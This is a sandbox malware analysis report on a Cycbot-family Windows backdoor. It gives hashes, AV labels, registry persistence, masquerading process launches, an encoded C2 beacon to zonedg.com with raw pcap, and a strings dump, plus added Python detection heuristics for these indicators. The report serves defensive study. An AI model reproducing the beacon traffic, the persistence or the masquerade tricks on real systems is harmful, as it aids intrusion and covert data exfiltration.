Analysis Date: 2014-10-14 23:37:44
MD5: 55bb46dabc1cecd98ac357102394b79f
SHA1: d9e837626951ddf46acecae2118f378a2e882d1e

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 5b1b41ca1ef9e6d49ea06a17628e223a sha1: 026225663ac5177334ad559563c79d98adfb9c43 size: 105984
Section .rdata md5: b1d07d72ec73f0a603eeea2993b219bc sha1: 200fdea7c0fe4a4a79173fb04cfbcbf317e4adf5 size: 1536
Section .data md5: 6bab8c7446cbdfa20c19b46b33d49762 sha1: 4996a6bee3152d376f088b78c2692a69ac713818 size: 87552
Section .reloc md5: 1f2899f3aa04df77a0346deced94237a sha1: 499b7ca0c4ec5125141c00d7864128b26cbed0d6 size: 1024
Timestamp: 2005-09-14 21:53:33
PEhash: cd2b1b534c72007e1bd594ed73b21b0f810cd661
IMPhash: 443f171adf78102839491b6270071b07
AV 360 Safe: Gen:Heur.Conjar.5
AV Ad-Aware: Gen:Heur.Conjar.5
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.K.gen!Eldorado
AV Avira (antivir): TR/Crypt.ZPACK.Gen
AV BullGuard: Gen:Heur.Conjar.5
AV CA (E-Trust Ino): Win32/FraudSecurity.B!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Win.Trojan.Cycbot-643
AV Dr. Web: Trojan.DownLoader5.1167
AV Emsisoft: Gen:Heur.Conjar.5
AV Eset (nod32): Win32/Kryptik.TQJ
AV Fortinet: W32/FakeAV.ISS!tr
AV Frisk (f-prot): W32/Goolbot.K.gen!Eldorado
AV F-Secure: Gen:Heur.Conjar.5
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Backdoor.Win32.Cycbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.s
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Heur.Conjar.5
AV Norman: win32/Cycbot.EH
AV Rising: Trojan.Win32.Generic.12A42007
AV Sophos: Mal/FakeAV-IS
AV Symantec: Trojan.Gen
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): Backdoor.Gbot
AV Yara APT: no_virus
AV Zillya!: Backdoor.Gbot.Win32.3504

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\WINDOWS\system32\lvvm.exe
Creates File: C:\WINDOWS\system32\lvvm.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\Documents and Settings\Administrator\Application Data\conhost.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\csrss.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\conhost.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: {5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {5D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: 127.0.0.1
Winsock DNS: gravatar.com
Winsock DNS: yourmediaspace.com
Winsock DNS: onlinehelptoall.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\csrss.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\conhost.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\conhost.exe
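The runtime records above contain three host-side behaviours worth turning into detection logic: a logon-persistence write to the Windows NT\CurrentVersion\Windows\Load value, an executable dropped into System32 by a process that does not live there, and system-binary names (csrss.exe, conhost.exe) launched from the user's Application Data directory. The Python below is an added example, not part of the sandbox report; it replays event records reconstructed from this report (plus one benign control record I constructed) through those rules. The system root C:\WINDOWS, the list of System32-only image names and the persistence value list are my assumptions.

```python
import ntpath

# Assumptions (mine, not the sandbox's): the system root is C:\WINDOWS as in
# this report, and these image names are ones Windows only ships in System32.
SYSTEM32 = r"c:\windows\system32"
SYSTEM_IMAGE_NAMES = {"csrss.exe", "conhost.exe", "smss.exe", "lsass.exe",
                      "winlogon.exe", "services.exe", "svchost.exe"}
# (key path below the hive, value name) pairs that run a program at user logon
LOGON_PERSISTENCE = {
    (r"software\microsoft\windows nt\currentversion\windows", "load"),
    (r"software\microsoft\windows nt\currentversion\windows", "run"),
    (r"software\microsoft\windows nt\currentversion\winlogon", "shell"),
    (r"software\microsoft\windows nt\currentversion\winlogon", "userinit"),
}

# Events reconstructed from the Runtime Details of this report, plus one benign
# control record (a real csrss.exe started from System32) that must not fire.
EVENTS = [
    {"type": "registry_set", "process": r"C:\malware.exe",
     "key": r"HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings",
     "value": "ProxyEnable", "data": "1"},
    {"type": "registry_set", "process": r"C:\malware.exe",
     "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows",
     "value": "Load", "data": r"C:\WINDOWS\system32\lvvm.exe"},
    {"type": "file_create", "process": r"C:\malware.exe",
     "path": r"C:\WINDOWS\system32\lvvm.exe"},
    {"type": "process_create", "parent": r"C:\malware.exe",
     "image": r"C:\Documents and Settings\Administrator\Application Data\conhost.exe"},
    {"type": "process_create", "parent": r"C:\malware.exe",
     "image": r"C:\Documents and Settings\Administrator\Application Data\Microsoft\csrss.exe"},
    {"type": "process_create", "parent": r"C:\WINDOWS\system32\smss.exe",
     "image": r"C:\WINDOWS\system32\csrss.exe"},
]


def _norm(path: str) -> str:
    return path.lower().replace("/", "\\")


def _in_system32(path: str) -> bool:
    return ntpath.dirname(_norm(path)) == SYSTEM32


def _key_below_hive(key: str) -> str:
    # Drop HKCU/HKLM/HKCC so the same subkey compares equal whichever hive it was written under.
    k = _norm(key)
    return k.split("\\", 1)[1] if "\\" in k else k


def evaluate(events: list) -> list:
    """Return (rule, detail) pairs for every event matching one of the heuristics."""
    hits = []
    for ev in events:
        kind = ev["type"]
        if kind == "registry_set":
            subkey, value = _key_below_hive(ev["key"]), ev["value"].lower()
            if (subkey, value) in LOGON_PERSISTENCE:
                hits.append(("logon_persistence",
                             f"{ev['process']} set {ev['key']}\\{ev['value']} = {ev['data']}"))
            # ProxyEnable=1 routes the user's web traffic through whatever ProxyServer names;
            # which processes may legitimately flip it is a per-site allow-list, so every hit is reported.
            if subkey.endswith(r"\internet settings") and value == "proxyenable" and ev["data"] == "1":
                hits.append(("proxy_enabled", f"{ev['process']} set ProxyEnable=1"))
        elif kind == "file_create":
            # An executable dropped into System32 by something that does not itself live there.
            p = _norm(ev["path"])
            if _in_system32(p) and p.endswith(".exe") and not _in_system32(ev["process"]):
                hits.append(("system32_drop", f"{ev['process']} wrote {ev['path']}"))
        elif kind == "process_create":
            # A well-known system binary name running from a user-writable directory.
            name = ntpath.basename(_norm(ev["image"]))
            if name in SYSTEM_IMAGE_NAMES and not _in_system32(ev["image"]):
                hits.append(("masquerade", f"{ev['parent']} started {ev['image']}"))
    return hits


if __name__ == "__main__":
    for rule, detail in evaluate(EVENTS):
        print(f"[{rule}] {detail}")
```

Run against the reconstructed events, the five malicious records fire and the System32 csrss.exe control record stays silent; the masquerade rule is the cheapest of the three to deploy, since a legitimate csrss.exe or conhost.exe never executes from a profile directory.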

Network Details:

DNS gravatar.com Type: A ➝ 192.0.80.239
DNS gravatar.com Type: A ➝ 192.0.80.240
DNS gravatar.com Type: A ➝ 192.0.80.241
DNS gravatar.com Type: A ➝ 192.0.80.242
DNS zonedg.com Type: A ➝ 141.8.225.80
DNS zonedg.com Type: A ➝ 141.8.225.80
DNS onlinehelptoall.com Type: A ➝ (no address in report)
DNS yourmediaspace.com Type: A ➝ (no address in report)
HTTP GET: http://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be2?v96=17&tq=gHZutDyMv5rJeTfia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 192.0.80.239:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f617661 7461722e 7068703f   GET /avatar.php?
0x00000010 (00016)   67726176 61746172 5f69643d 66326133   gravatar_id=f2a3
0x00000020 (00032)   38383961 66663666 63393731 31613363   889aff6fc9711a3c
0x00000030 (00048)   62636665 36343036 37626532 3f763936   bcfe64067be2?v96
0x00000040 (00064)   3d313726 74713d67 485a7574 44794d76   =17&tq=gHZutDyMv
0x00000050 (00080)   35724a65 54666961 396e726d 736c3667   5rJeTfia9nrmsl6g
0x00000060 (00096)   69577a25 32424a5a 62567941 25334420   iWz%2BJZbVyA%3D 
0x00000070 (00112)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000080 (00128)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000090 (00144)   743a2067 72617661 7461722e 636f6d0d   t: gravatar.com.
0x000000a0 (00160)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x000000b0 (00176)   65722d41 67656e74 3a206d6f 7a696c6c   er-Agent: mozill
0x000000c0 (00192)   612f322e 300d0a0d 0a                  a/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735350 54357775 67253242 74796766   VsSPT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 4238796a 59764561 53765425   ij%2B8yjYvEaSvT%
0x000000c0 (00192)   32427371 74537225 32466525 32425635   2BsqtSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735350 54357775 67253242 74796766   VsSPT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384f6f 59764561 53505425   ij%2B8OoYvEaSPT%
0x000000c0 (00192)   32427371 74537225 32466525 32425635   2BsqtSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a 20737563 68206669   lose.... such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.
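The hex dumps above are the ground truth for the network indicators, so it pays to parse them rather than eyeball them. The Python below is an added example, not part of the sandbox output: it rebuilds the GET and the first POST from the hex column, parses each into method, path, query parameters and headers, and then applies three heuristics that every request in this capture trips: the bare "mozilla/2.0" User-Agent (browsers send "Mozilla/5.0 (<platform>) ..."), a `tq` query parameter that is well-formed base64, and a POST with Content-Length: 0 whose payload rides in the query string. The dump text is copied from the Raw Pcap section; the heuristics and their thresholds are my own.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

# The first two request dumps, copied verbatim from the "Raw Pcap" section above.
GET_DUMP = """\
0x00000000 (00000)   47455420 2f617661 7461722e 7068703f   GET /avatar.php?
0x00000010 (00016)   67726176 61746172 5f69643d 66326133   gravatar_id=f2a3
0x00000020 (00032)   38383961 66663666 63393731 31613363   889aff6fc9711a3c
0x00000030 (00048)   62636665 36343036 37626532 3f763936   bcfe64067be2?v96
0x00000040 (00064)   3d313726 74713d67 485a7574 44794d76   =17&tq=gHZutDyMv
0x00000050 (00080)   35724a65 54666961 396e726d 736c3667   5rJeTfia9nrmsl6g
0x00000060 (00096)   69577a25 32424a5a 62567941 25334420   iWz%2BJZbVyA%3D
0x00000070 (00112)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000080 (00128)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000090 (00144)   743a2067 72617661 7461722e 636f6d0d   t: gravatar.com.
0x000000a0 (00160)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x000000b0 (00176)   65722d41 67656e74 3a206d6f 7a696c6c   er-Agent: mozill
0x000000c0 (00192)   612f322e 300d0a0d 0a                  a/2.0....
"""

POST_DUMP = """\
0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735350 54357775 67253242 74796766   VsSPT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 4238796a 59764561 53765425   ij%2B8yjYvEaSvT%
0x000000c0 (00192)   32427371 74537225 32466525 32425635   2BsqtSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length:
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....
"""

# hex offset, (decimal offset), up to four 8-digit hex groups; the ASCII column is ignored
HEX_LINE = re.compile(r"^0x[0-9a-fA-F]+\s+\(\d+\)\s+((?:[0-9a-fA-F]{8}\s)*[0-9a-fA-F]{2,8})")


def dump_to_bytes(dump: str) -> bytes:
    """Rebuild the raw bytes from the hex column of a sandbox dump."""
    digits = [m.group(1).replace(" ", "") for m in map(HEX_LINE.match, dump.splitlines()) if m]
    return bytes.fromhex("".join(digits))


def parse_request(raw: bytes) -> dict:
    """Split one HTTP request into method, path, query parameters, version and headers."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)  # splits at the first '?', so the stray '?v96=17' stays inside gravatar_id
    return {"method": method, "path": parts.path,
            "query": dict(parse_qsl(parts.query, keep_blank_values=True)),
            "version": version, "headers": headers, "body": body}


def beacon_indicators(req: dict) -> list:
    """Heuristics every request in this capture trips; the thresholds are my own, not the report's."""
    hits = []
    ua = req["headers"].get("user-agent", "")
    # Browsers send "Mozilla/5.0 (<platform>) ..."; a bare "mozilla/2.0" is a hand-rolled HTTP client.
    if re.fullmatch(r"mozilla/\d+\.\d+", ua, re.IGNORECASE):
        hits.append(f"bare User-Agent {ua!r}")
    tq = req["query"].get("tq")
    if tq is not None:
        try:
            base64.b64decode(tq, validate=True)
            hits.append(f"tq parameter is {len(tq)} chars of well-formed base64")
        except (binascii.Error, ValueError):
            pass
    if req["method"] == "POST" and req["headers"].get("content-length") == "0":
        hits.append("POST with Content-Length: 0 (payload carried in the query string)")
    return hits
```

Parsing rather than pattern-matching the dump is what exposes the oddities: the GET carries the `tq` blob on a real gravatar.com avatar URL and the POST to zonedg.com has an empty body, so a proxy log that only records bodies would miss the data entirely. The request line is the only place to look.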


Strings
{..
$o?W.
;
.
....
.
...
.
080904b0
1.0.0.1
1915
&Execute    Shift+E
FileVersion
PrivateBuild
ProductVersion
&shit menu
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
^^^^^^
~~~~~~~~~
<<<<<<<<
<<<<<<<<<<
<<<<<<<<<<<<
=========
|||||||
||||||||||
      
         
,,,,,,,
,,,,,,,,|||
,,,,,,,,,,,,,,,,
;;;;;;;;;;;;;
!!!!!!
!!!!!!!!!!
!!!!!!				
??????
???????
??????????????
.______________________
..........
''''''''''''
"""""""""
"""""""""""""
((((((((((((
)=^-_(
{{{{{{{
*******
********
*********
&&<<<<<'
&&&&&&&&
&&&&&&&&&&&####
#|]{	]
#######
%%%%%%%%%
+++++++
++++++++
+++++++++++++++++
++				
						
011111
04w:9W
0B`VS%
0M8{:y
~|0Rv)
1111111gggggggggg
(1E861e)
//1jhF
1o~_yA
1sz?F\
1;XEmK
22@@@@@@@eee
+)[	27
27^ngX{m
2d++re
`2|{#n
2sVMt 
<2uBL?Z
2u:Du)
33333333333
))333333333333lllllll
36`$'-
3>'LrV%
3RRv.v
44444444444444444
4?a95:J7
4%I!z8!
51_NJ/
,,55555
555555
555555555555
5(Bq/F:
"5fBlS
/5=z_}
666666>
66666666
6666666666
6666666MMM
6qfee|	
777777
,,,,77777mmmmmmmmmmmmmmnnn
$|||7E
7mVmNt7#n
{	7n?k
7~+|q7
7WTm!G=
888888
8888888
88;b?7
8(fYTW
8hffq_
8lqPDcM[
8[m]n!D|
:8s1!&
!8Wq%"
'8/x?l
;	8Y2A
_91*gLX
&999```
9999999
99999999
99999iiiii
9AAAAAAAAhhhh
%?/9xq
#a7[Q	
[A7q1q2j
AAAA%%%%%%%%
aaaaaaaaaaaaaaaa
>aad=r
_a:AMB
ac]x|`
ADVAPI32.dll
.Ail!">
^a&&-M
amshg('G{q
.a'_S0
aT*0GOE
baaaaaa
$bbbbb
###bbbbbbbbbbbb
:BDoi:R
B>vp;3.
?B)W0,
BYO~mX
ByZ\]BJ
~c4ZzN
c6Ut@~
c8888888
CCCCCC
CCCCCCCCCCCC
*********ccccccccccYYY
CG/'J*)
cIhcs.d
CM_Get_DevNode_Status
CMP_WaitNoPendingInstallEvents
C|]OLZ
CreateProcessW
CreateStdAccessibleObject
CTA[x`
@d| ,(
@.data
>>>>>DD
dddddd
DDDDDD
DDDDDDDD
*****DDDDDDDD
DDDDDDDDDDDDDDDDDbb
DDDDDDDDDDDDDDDDy
d_h8Ml
E7od5p
E&.9LA
|@'EA*
|||EEE
eeeeee
Ei]s_4
EI'$-Zp
En?:@NO
EnumResourceNamesA
[eNXnu"&@
ep_m0B
EvNv]UH(
-ew0Z[
F	6gh`,k
FC5Dkn
Fd>_l[Ec
\FFFFFFFFFFF
FFFj..
ff,,,,,,,,,,,,,,,,,,,,MMMMMMMMMM
FK16T-h
f	q:kj
[fv5/=
fvd%;a
g53,BtIA
G,9?N?n
.*Gd]"
GetACP
GetAtomNameW
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentVariableW
GetLocaleInfoW
GetModuleHandleW
GetStartupInfoW
GetSystemTimeAsFileTime
GetThreadLocale
GetTickCount
gggggg
ggggggg
gggggggggggggg
Gh385	
g~}/l3
-"G)/P
#GU{b	
GwGCW!	
gWHcxv
gxn$<1>QQ
H8888888888
h`b%z#opi
]HDTLK
HFd!dt
hhhhh9999999888
hhhhhhhhh
	}Hp."
<h,y?'j
"I6aB<+tQ
IBD:I\
"iEdX,C
i^=H;mN
....ii
IIIIIIIII!!!!
iiiikkkk
IIXXXX
InstallCatalog
InterlockedCompareExchange
InterlockedExchange
|||||||||||IQQQQQQQQQQQQ<<<<<
IsDebuggerPresent
I*TBQ5{
j         
j	\\\\\\\
j2AAAAAAP
JJJ___
JJJJJJ
jjjjjjjjj
jjjjjjPPPPPPP
JJJJJJ^^^^^^^^uuuuuuuuuu
%jou:[
JpN=LS
$`"jPz
;jQOCo
Jw#6AL
?	J%wF
)))))))K
[k0R7J
K3"c~<.
!K	e/H
KERNEL32.dll
KKKKccc
//~~~~~~~~~~~kkkkk
KKKKKKKK##
kkkkkkkkkkkk
kkkkkkkkkkkkkk
{{{KKKK///m
KKKWW"""""""
%K-mM>
`k]qdr
kRl~UP^F
Ktjhb(
kvi<Ka
Kzjp#Eh
|KZnPp
%"kZ^u
%KZx1c
@L0-""
L2S-RN7
"Lbo:a
L	B*+zw
~L;dEW
L^kaK_S
llll''''''
lllllllll
LLLLLLLLLLLLLh
llllllllllllllls
LocalAlloc
lP^!_0T
L_R=):
LresultFromObject
LR%yxH
lstrlenA
lstrlenW
lVbpSO9
lw*{]HCAe5
M2gK\}
mciSendCommandA
^MGaR7a	
M gQ0U6=
MG)U)B~
miD'v<
mmmmmmmmmmmmm
MS	zA$
MultiByteToWideChar
muW}''~
mybdh[4A
n2*1m-
N;66J!1
	/N$7d3
nAD5<;
=NB;'c
NC+dnH
NF_irp
:)nL3Sw
nnnnnn
nnnnnnnnnn
noMFHc
o6s]cA
oD%O""
OLEACC
[{oN2e
oooo\\\\\
//ooooo
oooooo
ooooooo!hhhhhhhhhhhh
ooooooooo
OOOOOOOOO
ooooooooooo
oSnEQQ?~
O?X3vT57
O[|y7o
OZha4|
<!"p5S/
PathAddBackslashA
pBq'+_
pDTEx1
pP$dT4
PPPPPBBBB
PPPPPPP
PPPPPPPPPPPPP
pwZb<o
q	CQ{4
QdL)K80
Q~HE5Q'
qJJJJJJJJJJJJJJJJJJJJJ
qL.>".
-'qor(P
QP]=.]qz
qqqqq!
QQQQQQ
qqqqqqqqq
QQQQQY
QueryPerformanceCounter
Q^wF.D
q*WzU4l
RaiseException
rA;+xB
`.rdata
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
.reloc
R*f!qW
*RMP0x
RRRRRRR
rrrrrrrBBB
:R`t|IR
RwxI1'
S&>1FV
+`S-6R
SetUnhandledExceptionFilter
SETUPAPI.dll
SetupDiGetDeviceRegistryPropertyW
|!s'hl
SHLWAPI.dll
Sjj{KS
<+)]slIT
sndPlaySoundA
SoHuW.x
__SS>W
sxCP"Y
s&"zS+
	=T0{,
t-2ilU+
<TcR5W
tE>iG^y
TerminateProcess
TF|\I;
!This program cannot be run in DOS mode.
^@TiT##W]
TS?4xNn
ttttttt
tU0~^;
&:tXJt
:tZ;D\
TzSpecificLocalTimeToSystemTime
u=!@*_
	:u5^'
@U5 NT
+/u&8m
u.9~-+[
uaj|\T
uB7!uwa
U@:Crr
-/uf6DY	
>UL$&aV
UnhandledExceptionFilter
]UoA+w
+U(=PZ
;US:+d^
U/sn-}W
U!&-;tnQ
UtZj/r
u?]U-m
!!!!!!!!!!!uuuuuuu
UUUUUUUUUU
^^UUUZ
V1p<ch
v1UwrM
V=6hg[D
vd9nR$
:@#VDa
vmIC?K
#V) N%
]?Vnm(
vnnnnnnnn
vRJfR|
^v#SXl
}!VvTKq
////////VVVV
**VVVV
VVVVVV
vvvvvvvv
vvvvvvvvvvvvvvv
v=z5>;
Vzb=ck
}w8Lm$s
WideCharToMultiByte
WINMM.dll
wwwwwww
'WZ"{t
X]FdJO
%XR'(2JV
]xS@%j
xxxxxx
XZ|BU8
'y]0;9.
Y}jp;n
y;O`ax
yq {CC
))yyeeeeeee
						YYYY
yyyyyy
YYYYYY
yZZZZZ
^z;;/A|
zk-	N)-
^ZSjM#
Z`}Tt6kn
zw4Q>\+2A L-
zXAk1'
Z}yRg*u
'ZzVt\,
ZZZZZZZZWWWWWWWW
ZZZZZZZZZZZZZZ